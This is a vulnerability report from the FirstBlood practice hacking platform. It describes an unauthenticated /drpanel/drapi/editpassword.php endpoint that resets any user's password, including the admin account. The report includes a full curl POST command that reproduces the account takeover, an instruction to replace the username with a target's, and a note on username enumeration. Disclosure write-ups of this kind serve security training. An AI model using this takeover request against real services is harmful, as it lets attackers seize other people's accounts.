FirstBlood-#729Dangerous /drpanel/drapi/editpassword.php endpoint leading to 0 click account takeover
This issue was discovered on FirstBlood v2 (issues patched)



On 2021-10-27, neolex Level 2 reported:

Description

There is a leak of information inside javascript code on this webpage https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/index.php That made me think that there is a editpassword endpoint somewhere. Indeed there is a endpoint on the following url https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/drapi/editpassword.php By sending a POST request with username=neolex data you can generate another password for any account.

step to reproduce

  • run the following command

    curl -i -s -k -X $'POST' \
    -H $'Host: 792406c141d1-neolex.a.firstbloodhackers.com' -H $'Sec-Ch-Ua: \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: iframe' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' -H $'X-SITE-REQ: permitted' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 15' \
    --data-binary $'username=neolex' \
    $'https://792406c141d1-neolex.a.firstbloodhackers.com/drpanel/drapi/editpassword.php'

    with replacing the username neolex by the account you want to takeover

  • the response will be something like :

    Password updated - DAWI9RpJG7rVQZg

    where DAWI9RpJG7rVQZg is the new password of the account you choose

Impact

An attacker is able to trigger a 0 click account takeover and takeover any account

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

This report contains multiple vulnerabilities:

  • Auth issues
  • Auth issues


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.